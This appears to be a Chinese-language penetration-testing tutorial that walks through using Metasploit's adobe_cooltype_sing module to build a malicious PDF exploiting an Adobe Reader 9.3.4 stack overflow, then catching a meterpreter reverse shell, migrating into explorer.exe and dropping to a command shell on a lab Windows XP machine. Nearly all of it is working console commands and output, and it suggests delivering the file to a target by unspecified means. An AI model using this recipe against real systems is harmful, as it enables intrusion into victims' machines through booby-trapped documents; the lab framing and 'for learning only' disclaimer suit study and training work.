前言
使用PDF文件对目标进行渗透测试
一、漏洞介绍
测试案例 | 描述 |
---|---|
漏洞 | Smart Independent Glyplets (SING)表中的uniquename存在着栈溢出漏洞 |
影响到的版本 | windows、macintosh和unix的Adobe Reader 9.3.4 / Acrobat 9.3.4及更早版本 |
二、渗透步骤
1.生成恶意pdf文件
msf6 > use exploit/windows/fileformat/adobe_cooltype_sing
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/adobe_cooltype_sing) > options
Module options (exploit/windows/fileformat/adobe_cooltype_sing):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.pdf yes The file name.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
**DisablePayloadHandler: True (no handler will be created!)**
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/fileformat/adobe_cooltype_sing) > exploit
[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /root/.msf4/local/msf.pdf
可以看到恶意pdf文件已经生成在/root/.msf4/local/msf.pdf,现在就可以通过一些特殊手段发送给目标主机
2.启动主控端handler
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set lhost 192.168.1.113
lhost => 192.168.1.113
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.115:1878) at 2021-05-13 11:08:03 +0800
meterpreter >
可以看到,生的恶意文件已经在目标主机上运行(本机),接下来,可以进行一些基本操作
将权限迁移到另一个更安全的进程上
meterpreter > getpid
Current pid: 1144
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0 NT AUTHORITY\SYSTEM
248 736 VGAuthService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
448 736 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
544 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 544 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
692 544 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
736 692 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
748 692 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
916 736 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
932 736 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1000 736 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1144 736 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1276 736 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1324 736 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1384 932 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
1516 736 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1524 1760 rundll32.exe x86 0 WINXP-1\st21 C:\WINDOWS\system32\rundll32.exe
1532 1144 wscntfy.exe x86 0 WINXP-1\st21 C:\WINDOWS\system32\wscntfy.exe
1544 736 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1608 1760 vmtoolsd.exe x86 0 WINXP-1\st21 C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1704 1760 ctfmon.exe x86 0 WINXP-1\st21 C:\WINDOWS\system32\ctfmon.exe
1760 1732 explorer.exe x86 0 WINXP-1\st21 C:\WINDOWS\Explorer.EXE
1924 736 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1932 736 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
2060 1760 cmd.exe x86 0 WINXP-1\st21 C:\WINDOWS\system32\cmd.exe
2116 1760 IEXPLORE.EXE x86 0 WINXP-1\st21 C:\Program Files\Internet Explorer\iexplore.exe
2476 736 metsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\MWPrEozxdnwJwU\metsvc.exe
3368 3348 phpStudy.exe x86 0 WINXP-1\st21 C:\phpStudy\phpStudy.exe
3424 3368 httpd.exe x86 0 WINXP-1\st21 C:\phpStudy\PHPTutorial\Apache\bin\httpd.exe
3432 3368 mysqld.exe x86 0 WINXP-1\st21 C:\phpStudy\PHPTutorial\MySQL\bin\mysqld.exe
3440 3400 conime.exe x86 0 WINXP-1\st21 C:\WINDOWS\system32\conime.exe
3568 3424 httpd.exe x86 0 WINXP-1\st21 C:\phpStudy\PHPTutorial\Apache\bin\httpd.exe
meterpreter > migrate 1760
[*] Migrating from 1144 to 1760...
[*] Migration completed successfully.
列出目标主机的网络信息
meterpreter > ipconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter - rface
Hardware MAC : 00:0c:29:95:e3:e1
MTU : 1500
IPv4 Address : 192.168.1.115
IPv4 Netmask : 255.255.255.0
Interface 65540
============
Name : Bluetooth `�
Hardware MAC : 94:b8:6d:d2:53:f2
MTU : 1500
进入shell
meterpreter > shell
Process 1452 created.
Channel 1 created.
Microsoft Windows XP [�汾 5.1.2600]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.
C:\Documents and Settings\st21>ls
ls
'ls' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���
C:\Documents and Settings\st21>dir
dir
������ C �еľ�û�б�ǩ��
��������� 5436-1D2F
C:\Documents and Settings\st21 ��Ŀ¼
2021-04-14 10:42 <DIR> .
2021-04-14 10:42 <DIR> ..
2021-03-23 21:19 <DIR> Favorites
2021-03-23 21:19 <DIR> My Documents
2021-03-23 21:07 <DIR> ����ʼ���˵�
2021-04-26 13:19 <DIR> ����
0 ���ļ� 0 ��
6 ��Ŀ¼ 38,396,850,176 ������
C:\Documents and Settings\st21>
总结
本文简单介绍了使用metasploit生成恶意PDF文件对目标主渗透测试,仅供学习使用